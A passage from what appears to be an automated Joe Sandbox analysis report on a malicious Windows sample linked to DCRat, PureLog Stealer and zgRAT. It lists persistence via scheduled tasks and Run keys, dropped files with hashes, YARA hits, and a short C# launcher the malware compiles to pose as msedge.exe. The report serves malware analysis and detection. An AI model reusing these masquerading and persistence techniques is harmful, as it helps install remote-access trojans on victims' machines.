                                    https://contoso.com/ | powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    https://nuget.org/nuget.exe | powershell.exe, 00000026.00000002.3505599922.0000015E10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3617998223.0000016722D93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3553159846.0000020C90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3412038875.000001F010073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    https://contoso.com/License | powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    https://contoso.com/Icon | powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                            No contacted IP infos
                                                            Joe Sandbox version: 42.0.0 Malachite
                                                            Analysis ID: 1589198
                                                            Start date and time: 2025-01-11 16:24:11 +01:00
                                                            Joe Sandbox product: CloudBasic
                                                            Overall analysis duration: 0h 9m 6s
                                                            Hypervisor based Inspection enabled: false
                                                            Report type: full
                                                            Cookbook file name: default.jbs
                                                            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of new started processes analysed: 65
                                                            Number of new started drivers analysed: 0
                                                            Number of existing processes analysed: 0
                                                            Number of existing drivers analysed: 0
                                                            Number of injected processes analysed: 0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode: default
                                                            Sample name: top.exe
                                                            Detection: MAL
                                                            Classification: mal100.spre.troj.expl.evad.winEXE@52/63@0/0
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 57%
                                                            • Number of executed functions: 210
                                                            • Number of non-executed functions: 109
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): Conhost.exe, SystemSettings.exe, dllhost.exe, OfficeClickToRun.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe, WmiPrvSE.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fsin.top
                                                            • Execution Graph export aborted for target WinPerfcommon.exe, PID 1020 because it is empty
                                                            • Not all processes were analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            Time | Type | Description
                                                            10:25:42 | API Interceptor | 176x Sleep call for process: powershell.exe modified
                                                            16:25:39 | Task Scheduler | Run new task: OfficeClickToRun path: "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"
                                                            16:25:39 | Task Scheduler | Run new task: OfficeClickToRunO path: "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"
                                                            16:25:39 | Task Scheduler | Run new task: SystemSettingsS path: "C:\Program Files\MSBuild\Microsoft\SystemSettings.exe"
                                                            16:25:39 | Task Scheduler | Run new task: WmiPrvSE path: "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe"
                                                            16:25:39 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe"
                                                            16:25:39 | Task Scheduler | Run new task: wnSgpBKJabSHvDawwFjyhiOtGEGVta path: "C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe"
                                                            16:25:39 | Task Scheduler | Run new task: wnSgpBKJabSHvDawwFjyhiOtGEGVtaw path: "C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe"
                                                            16:25:42 | Task Scheduler | Run new task: SystemSettings path: "C:\Program Files\MSBuild\Microsoft\SystemSettings.exe"
                                                            16:25:42 | Task Scheduler | Run new task: WinPerfcommon path: "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"
                                                            16:25:42 | Task Scheduler | Run new task: WinPerfcommonW path: "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"
                                                            16:25:43 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"
                                                            16:25:52 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe"
                                                            16:26:00 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVta "C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe"
                                                            16:26:08 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\MSBuild\Microsoft\SystemSettings.exe"
                                                            16:26:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"
                                                            16:26:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"
                                                            16:26:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe"
                                                            16:26:46 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVta "C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe"
                                                            16:26:55 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\MSBuild\Microsoft\SystemSettings.exe"
                                                            16:27:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"
                                                            16:27:14 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"
                                                            16:27:23 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe"
                                                            16:27:31 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVta "C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe"
                                                            16:27:40AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\MSBuild\Microsoft\SystemSettings.exe"
                                                            16:27:49AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe | WinPerfcommon.exe | | malicious | DCRat, PureLog Stealer, zgRAT | |
C:\Program Files\MSBuild\Microsoft\SystemSettings.exe | WinPerfcommon.exe | | malicious | DCRat, PureLog Stealer, zgRAT | |
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type: MSVC .res
Category: dropped
Size (bytes): 1168
Entropy (8bit): 4.448520842480604
Encrypted: false
SSDEEP: 24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5: B5189FB271BE514BEC128E0D0809C04E
SHA1: 5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256: E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512: F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious: false
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 4608
Entropy (8bit): 3.938445843037243
Encrypted: false
SSDEEP: 48:6zmttVxZ8RxeOAkFJOcV4MKe28dedZzOvqBHHuulB+hnqXSfbNtm:/KxvxVx9Jvk5TkZzNt
MD5: C137E4E4299D48A19B11A596DFA8A20A
SHA1: 1FDED2B159D9A33FE125492418F08F5914A64914
SHA-256: B34EEDA908DDFC77878EDB3C48093E1C9738541208AE4A5A894B641EB5641F2B
SHA-512: A2D7215268E4C6FEDD9318A20FAE767E7924C28644DE02D9CB9FB92B5E04088F95825898E9F159FCF7C8A9B63CD359B54B4A961FF1E909D00BEAE5B143C8EE78
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Process: C:\msproviderBrokerMonitornet\WinPerfcommon.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2020864
Entropy (8bit): 7.570829238606583
Encrypted: false
SSDEEP: 49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
MD5: 6B9554367A439D39A00A0DFF9A08B123
SHA1: E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
SHA-256: 3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
SHA-512: 72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
• Antivirus: Virustotal, Detection: 70%
Joe Sandbox View:
• Filename: WinPerfcommon.exe, Detection: malicious
Process: C:\msproviderBrokerMonitornet\WinPerfcommon.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 293
Entropy (8bit): 5.782944238729157
Encrypted: false
SSDEEP: 6:aReuYy/9oHDMWjiaR+NdR2noXY6utwTpVxQcV7VUeWDmHA:aReupoJ+RhYtAxQ27VUJDmHA
MD5: C7F106CF3F226F436E83C92DDD139870
SHA1: F589646B859817BBC6A806F84EA2A3794C1BB5BB
SHA-256: 447327F237EFF1EA1EFBFC39F34D47FC18826D491A82F4EBD3ACF95904FB268F
SHA-512: 3575B551B3C8A485836BABEA6FE78EFF18FC38C2EC7E865A075D205C5418CBE7B08D77F2976EDF1C5B35AB7D4163C0B61E852E449DE3FBC735CDFB3B28558C4A
Malicious: false
Process: C:\msproviderBrokerMonitornet\WinPerfcommon.exe
File Type: ASCII text, with very long lines (348), with no line terminators
Category: dropped
Size (bytes): 348
Entropy (8bit): 5.778808567693445
Encrypted: false
SSDEEP: 6:+S/O+zRNBadqcwEG00wY2mdr+uZIJ9P7CT0EBuCkv4EFId0OMc7VjnG1CQGvP4dD:tG+zTBSnwEFNmVw9PI0EBwVOMOZG8vAl
MD5: CDEEF638CA590517B8DBA031F17DB71D
SHA1: CAB0DED8A04FC44FB7F49FDDDF44E438B45A633A
SHA-256: E19384DA0420D5E14EDF3A0ECF443B3CE779178E6D2E8FC620246D1EFB7FC653
SHA-512: FDCE5B3405B05A71CEDE9C45138276C345987922AF05ED9133A9E3FE18B8769033D27BA35C96CC23F9763F4429BF69D6D0FC3497E828DBA19C71E528FED637A6
Malicious: false
Process: C:\msproviderBrokerMonitornet\WinPerfcommon.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2020864
Entropy (8bit): 7.570829238606583
Encrypted: false
SSDEEP: 49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
MD5: 6B9554367A439D39A00A0DFF9A08B123
SHA1: E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
SHA-256: 3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
SHA-512: 72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
• Antivirus: Virustotal, Detection: 70%
Joe Sandbox View:
• Filename: WinPerfcommon.exe, Detection: malicious
Process: C:\msproviderBrokerMonitornet\WinPerfcommon.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 118
Entropy (8bit): 5.4913035111862
Encrypted: false
SSDEEP: 3:VRF3EGwkY44/0qVtL4WgHhkEpEv4sdO3wTqyIXLK:iGwh44ttL4Z1KgsdOATHWK
MD5: 542C80268C16D6CE54DB817D7D76F77A
SHA1: A8B1DE0B4C708BDDB1C70C592169B4D9489C5214
SHA-256: 3FF17CECAA79275324BB681F5A64A2F366F249D2511726739FA1986642CFD5A7
SHA-512: BA89998D530C4D82430F0F750111737072FC45F77D8A30434C9F60D2ADC1AF0C66DB54169D5BA75C6F22FB9556F2524338B69856B61E1F168E8D81583A55DEC5
Malicious: false
Process: C:\msproviderBrokerMonitornet\WinPerfcommon.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2020864
Entropy (8bit): 7.570829238606583
Encrypted: false
SSDEEP: 49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
MD5: 6B9554367A439D39A00A0DFF9A08B123
SHA1: E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
SHA-256: 3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
SHA-512: 72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
• Antivirus: Virustotal, Detection: 70%
Process: C:\msproviderBrokerMonitornet\WinPerfcommon.exe
File Type: ASCII text, with very long lines (377), with no line terminators
Category: dropped
Size (bytes): 377
Entropy (8bit): 5.813984273872232
Encrypted: false
SSDEEP: 6:+jNF8wgrUro61UpYMYPoUUT9P2STsOvtgtPjLBRlIZ9LHvd7cPEGG/c26vya7PVB:+RKoUiMYK2UGP3BzInLvdY5G0lvyaLVB
MD5: E7C7B64B5C4958F6B0857FE2184EF68B
SHA1: 7086069BA4244C8C67191F2580ED1CEB84B49294
SHA-256: ADB8EE0C969B2ED583A26C7999E87F2379C0F4A685866033F982FD70D1136AEB
SHA-512: 28815DB7510FB88112ACD52CF2968D56114D7669E07DDDF16C8B0D37B67F775B6ED80F0393D6FF4710E7FE4BF89133AF7B000C887EECAC6653E244C41166EC0E
Malicious: false
Process: C:\msproviderBrokerMonitornet\WinPerfcommon.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2020864
Entropy (8bit): 7.570829238606583
Encrypted: false
SSDEEP: 49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
MD5: 6B9554367A439D39A00A0DFF9A08B123
SHA1: E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
SHA-256: 3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
SHA-512: 72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
Process: C:\msproviderBrokerMonitornet\WinPerfcommon.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1396
Entropy (8bit): 5.350961817021757
Encrypted: false
SSDEEP: 24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5: EBB3E33FCCEC5303477CB59FA0916A28
SHA1: BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256: DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512: 663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                Process:C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):847
                                                                Entropy (8bit):5.354334472896228
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                Malicious:false
                                                                Preview:@...e................................. ..............@..........
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                Category:dropped
                                                                Size (bytes):430
                                                                Entropy (8bit):4.999150238049071
                                                                Encrypted:false
                                                                SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LSMdBu0qCaiFkD:JNVQIbSfhWLzIiFkMSfhWLSMdU0qC7FI
                                                                MD5:E62EC9FBB277830D68682FE953D9E791
                                                                SHA1:7C89FABCF6820C1788DFB24241F5E32714212A6E
                                                                SHA-256:845E96E267ABF11485AA0670C2EE8D082B1DF8D08066526246D56E33EB4804FD
                                                                SHA-512:AFBFE82327E27ECF161F2E29E11750904A89B11E9B874394C57DE08E4589B7DB612097BF0952284FE4F8A8041EB6D1F10B6CB65A4968AC21966A0D84066C2FD7
                                                                Malicious:false
                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"); } catch { } }).Start();. }.}.
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):5.155244518318101
                                                                Encrypted:false
                                                                SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923f3tFx:Hu7L//TRRzscQyPtFx
                                                                MD5:04E4B9B5D790651107477A2763799F2F
                                                                SHA1:2E5A3869262A113C553CFE6F3E3F78305B3C5FF8
                                                                SHA-256:29631AE81DEDA54F7FB49F2E6C64CC313C6F8F924AF77638C3EBD18C604BFADA
                                                                SHA-512:4EEA46505AFDF64A83AFE67B3914F089619FEF0B71A77977B39DFEFAE378B635D08E49C497FD405A8CF5865D8DB5E47CA4F61DA9CA2D42AAC8E1750411B738D8
                                                                Malicious:true
                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.0.cs"
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (352), with CRLF, CR line terminators
                                                                Category:modified
                                                                Size (bytes):773
                                                                Entropy (8bit):5.243122303850398
                                                                Encrypted:false
                                                                SSDEEP:24:y9I/un/VRzstyMKax5DqBVKVrdFAMBJTH:y9N/VRzfMK2DcVKdBJj
                                                                MD5:BC4E40E89611469AE25DBCB5E601FCD4
                                                                SHA1:B6B189479BFB1F769D36CBD2055141F79A3F2DFA
                                                                SHA-256:107302ED39130FED0CEE4201400A994303B23BB7114CDC4387786EA574244F64
                                                                SHA-512:0D7502635D9CAE9CE436601A20D9ECE6B96CC1F497AA39FBC4CC7AC5391E1993CE62A360D1024CF3E2D3901FA9D3B859FE62F22D1181FC75EE67734B75736DE4
                                                                Malicious:false
                                                                Preview:.C:\msproviderBrokerMonitornet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):25
                                                                Entropy (8bit):4.163856189774723
                                                                Encrypted:false
                                                                SSDEEP:3:JgeoVy:+g
                                                                MD5:99C3E12460236012B006E9C11F4D22F2
                                                                SHA1:25359E87BF01FFA9C9D3885EF1807E12569794E2
                                                                SHA-256:168FDD35F2E5F9C566C3E28A6EC58EFE11C0CFF2D686879E4698A620A9EE7541
                                                                SHA-512:0DF2D08120B20505AD0EDFE98FC84B4585BA35D484980FDF2EC4F8EE8B2DDB2B47AE66DC4F0C0FA2B0890B03EAAE64F6F8FDAAEC405CB6E3515DD702A76EB8DE
                                                                Malicious:false
                                                                Preview:yY451wFfTYrGp727oFvM0YYAP
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d8, 10 symbols, created Sat Jan 11 16:42:49 2025, 1st section name ".debug$S"
                                                                Category:dropped
                                                                Size (bytes):1936
                                                                Entropy (8bit):4.607477947796084
                                                                Encrypted:false
                                                                SSDEEP:24:HUy9FLz3OHPwK5N6lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+mcN:3Lz3O4K5klmuulB+hnqXSfbNtmhz
                                                                MD5:7FE59190F628DDF562DA8933DBA0B177
                                                                SHA1:ADD835B1BEE73A2AB2C268017512849AB7EA27EF
                                                                SHA-256:5D9D6F8ED6B69E0A9032021EA56BFAF2DC9359A8B01C6F5D6EA37F6A79E5524E
                                                                SHA-512:9F7467058C226922F9638218CA7955F739A21361F7D86FA7A64A3E4A6EFC490BEF5772214AFEDE077DAB26B4C0B85BCD182A7635DF4C49C4C935BE05C057AA72
                                                                Malicious:false
                                                                Preview:L......g.............debug$S........`...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES4FDD.tmp.-.<....................a..Microsoft (R) CVTRES.e.=..cwd.C:\msproviderBrokerMonitornet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f4, 10 symbols, created Sat Jan 11 16:42:49 2025, 1st section name ".debug$S"
